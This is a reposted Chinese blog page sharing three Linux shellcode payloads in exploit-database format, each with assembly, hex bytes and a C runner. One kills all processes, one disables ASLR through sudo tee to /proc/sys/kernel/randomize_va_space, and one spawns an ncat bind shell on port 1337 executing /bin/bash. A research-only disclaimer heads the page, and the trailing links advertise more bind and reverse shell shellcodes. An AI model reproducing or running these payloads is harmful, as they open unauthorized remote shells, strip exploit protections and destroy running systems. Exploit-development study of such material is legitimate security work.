[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)

Posted 鸿渐之翼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)相关的知识,希望对你有一定的参考价值。

免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。

Linux/x86 - Kill All Processes Shellcode (14 bytes)

# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------

This shellcode will kill all processes

-----------------------------[Shellcode Dump]---------------------------------

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: b0 25                 mov    $0x25,%al
 8048065: bb ff ff ff ff        mov    $0xffffffff,%ebx
 804806a: b1 09                 mov    $0x9,%cl
 804806c: cd 80                 int    $0x80

 -----------------------------[Compile]---------------------------------------------
 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

 -----------------------------[C-Code]-----------------------------

 #include<stdio.h>
 #include<string.h>

 unsigned char code[] = "\\x31\\xc0\\x50\\xb0\\x25\\xbb\\xff\\xff\\xff\\xff\\xb1\\x09\\xcd\\x80";
 main()
 

     printf("Shellcode Length: %d\\n", strlen(code));

     int (*ret)() = (int(*)())code;

     ret();
 
Linux/x64 - 禁用 ASLR 安全 Shellcode(93 字节)
Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
/*
 ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64

 Author : Kağan Çapar
 contact: kagancapar@gmail.com
 shellcode len : 93 bytes
 compilation: gcc -fno-stack-protector -z execstack [.c] -o []
 
 Test:
 run shellcode (./aslr etc.)
 check : cat /proc/sys/kernel/randomize_va_space
 you will see "0"

 Assembly:

 global _start          
 section .ASLR
 _start:

 #6A3B              push byte +0x3b
 #58                pop eax
 #99                cdq
 #48                dec eax
 #BB2F62696E        mov ebx,0x6e69622f
 #2F                das
 #7368              jnc 0x75
 #005348            add [ebx+0x48],dl
 #89E7              mov edi,esp
 #682D630000        push dword 0x632d
 #48                dec eax
 #89E6              mov esi,esp
 #52                push edx
 #E836000000        call 0x56
 #6563686F          arpl [gs:eax+0x6f],bp
 #2030              and [eax],dh
 #207C2073          and [eax+0x73],bh
 #7564              jnz 0x90
 #6F                outsd
 #20746565          and [ebp+0x65],dh
 #202F              and [edi],ch
 #7072              jo 0xa7
 #6F                outsd
 #632F              arpl [edi],bp
 #7379              jnc 0xb3
 #732F              jnc 0x6b
 #6B65726E          imul esp,[ebp+0x72],byte +0x6e
 #656C              gs insb
 #2F                das
 #7261              jc 0xa6
 #6E                outsb
 #646F              fs outsd
 #6D                insd
 #697A655F76615F    imul edi,[edx+0x65],dword 0x5f61765f
 #7370              jnc 0xc2
 #61                popa
 #636500            arpl [ebp+0x0],sp
 #56                push esi
 #57                push edi
 #48                dec eax
 #89E6              mov esi,esp
 #0F05              syscall

*/

#include <stdio.h>
#include <string.h>

unsigned char ASLR[] = \\
"\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x53"
"\\x48\\x89\\xe7\\x68\\x2d\\x63\\x00\\x00\\x48\\x89\\xe6\\x52\\xe8\\x36\\x00"
"\\x00\\x00\\x65\\x63\\x68\\x6f\\x20\\x30\\x20\\x7c\\x20\\x73\\x75\\x64\\x6f"
"\\x20\\x74\\x65\\x65\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x79\\x73\\x2f"
"\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x2f\\x72\\x61\\x6e\\x64\\x6f\\x6d\\x69\\x7a"
"\\x65\\x5f\\x76\\x61\\x5f\\x73\\x70\\x61\\x63\\x65\\x00\\x56\\x57\\x48\\x89"
"\\xe6\\x0f\\x05";

int main()

 printf("Shellcode len: %d\\n", strlen(ASLR));
 
 int (*ret)() = (int(*)())ASLR;
 
 ret();
 


Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
/* 
   Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
   Author : T3jv1l
   Contact: t3jv1l@gmail.com
   Twitter:https://twitter.com/T3jv1l
   Shellcode len : 119 bytes
   Compilation: gcc  shellcode.c -o shellcode
   Compilation for x64 : gcc -m32 shellcode.c -o shellcode
   Tested On: Ubuntu 16.04.5 LTS 
   Arch: x86
   Size: 95 bytes
   Thanks for helping NytroRST


############################################################################
global _start:
_start:
jmp short todo


shellcode:

xor eax, eax            ;Zero out eax
xor ebx, ebx            ;Zero out ebx 
xor ecx, ecx            ;Zero out ecx
cdq	      		;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4       ;Setresuid syscall 164 (0xa4)
int 0x80                ;Syscall execute
pop esi                 ;Esi contain the string in db
xor eax, eax            ;Zero out eax
mov[esi+13], al         ;Null terminate /usr/bin/ncat
mov[esi+22], al         ;Null terminate -lvp1337
mov[esi+34], al         ;Null terminate -e/bin/bash
mov[esi+35], esi        ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14]       ;Load address of -lvp1337
mov[esi+39], ebx        ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23]       ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx        ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax        ;Zero out DDDD
mov al, 11              ;11 is execve syscall number 
mov ebx, esi            ;Store address of /usr/bin/ncat
lea ecx, [esi+35]       ;Load address of ptr to argv[] array
lea edx, [esi+47]       ;envp[] NULL
int 0x80                ;Syscall execute

todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
;   012345678901234567890123456789012345678901234567890

######################################################################################

ncat.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	eb 35                	jmp    37 <todo>

00000002 <shellcode>:
   2:	31 c0                	xor    %eax,%eax
   4:	31 db                	xor    %ebx,%ebx
   6:	31 c9                	xor    %ecx,%ecx
   8:	99                   	cltd   
   9:	b0 a4                	mov    $0xa4,%al
   b:	cd 80                	int    $0x80
   d:	5e                   	pop    %esi
   e:	31 c0                	xor    %eax,%eax
  10:	88 46 0d             	mov    %al,0xd(%esi)
  13:	88 46 16             	mov    %al,0x16(%esi)
  16:	88 46 22             	mov    %al,0x22(%esi)
  19:	89 76 23             	mov    %esi,0x23(%esi)
  1c:	8d 5e 0e             	lea    0xe(%esi),%ebx
  1f:	89 5e 27             	mov    %ebx,0x27(%esi)
  22:	8d 5e 17             	lea    0x17(%esi),%ebx
  25:	89 5e 2b             	mov    %ebx,0x2b(%esi)
  28:	89 46 2f             	mov    %eax,0x2f(%esi)
  2b:	b0 0b                	mov    $0xb,%al
  2d:	89 f3                	mov    %esi,%ebx
  2f:	8d 4e 23             	lea    0x23(%esi),%ecx
  32:	8d 56 2f             	lea    0x2f(%esi),%edx
  35:	cd 80                	int    $0x80

00000037 <todo>:
  37:	e8 c6 ff ff ff       	call   2 <shellcode>
  3c:	2f                   	das    
  3d:	75 73                	jne    b2 <todo+0x7b>
  3f:	72 2f                	jb     70 <todo+0x39>
  41:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  44:	2f                   	das    
  45:	6e                   	outsb  %ds:(%esi),(%dx)
  46:	63 61 74             	arpl   %sp,0x74(%ecx)
  49:	23 2d 6c 76 70 31    	and    0x3170766c,%ebp
  4f:	33 33                	xor    (%ebx),%esi
  51:	37                   	aaa    
  52:	23 2d 65 2f 62 69    	and    0x69622f65,%ebp
  58:	6e                   	outsb  %ds:(%esi),(%dx)
  59:	2f                   	das    
  5a:	62 61 73             	bound  %esp,0x73(%ecx)
  5d:	68 23 41 41 41       	push   $0x41414123
  62:	41                   	inc    %ecx
  63:	42                   	inc    %edx
  64:	42                   	inc    %edx
  65:	42                   	inc    %edx
  66:	42                   	inc    %edx
  67:	43                   	inc    %ebx
  68:	43                   	inc    %ebx
  69:	43                   	inc    %ebx
  6a:	43                   	inc    %ebx
  6b:	44                   	inc    %esp
  6c:	44                   	inc    %esp
  6d:	44                   	inc    %esp
  6e:	44                   	inc    %esp
###################################################################################
*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int (*shellcodetotest)();

char shellcode[] = "\\xeb\\x35\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x99\\xb0\\xa4\\xcd\\x80\\x5e\\x31\\xc0\\x88\\x46\\x0d\\x88\\x46\\x16\\x88\\x46\\x22\\x89\\x76\\x23\\x8d\\x5e\\x0e\\x89\\x5e\\x27\\x8d\\x5e\\x17\\x89\\x5e\\x2b\\x89\\x46\\x2f\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x23\\x8d\\x56\\x2f\\xcd\\x80\\xe8\\xc6\\xff\\xff\\xff\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\\x61\\x74\\x23\\x2d\\x6c\\x76\\x70\\x31\\x33\\x33\\x37\\x23\\x2d\\x65\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x23";
 


int main(int argc, char **argv) 
	void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
	if(ptr == MAP_FAILED)
		perror("mmap");
		exit(-1);
printf("Shellcode Length:  %d\\n", strlen(shellcode));
	


	memcpy(ptr, shellcode, sizeof(shellcode));
	shellcodetotest = ptr;
	shellcodetotest();
	return 0;



以上是关于[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)的主要内容,如果未能解决你的问题,请参考以下文章

[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)

[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)

[shellcode分享]Linux/x86 - 绑定 (99999/TCP) NetCat 传统 (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)

[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)

[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)

SniperOj-shorter-shellcode-x86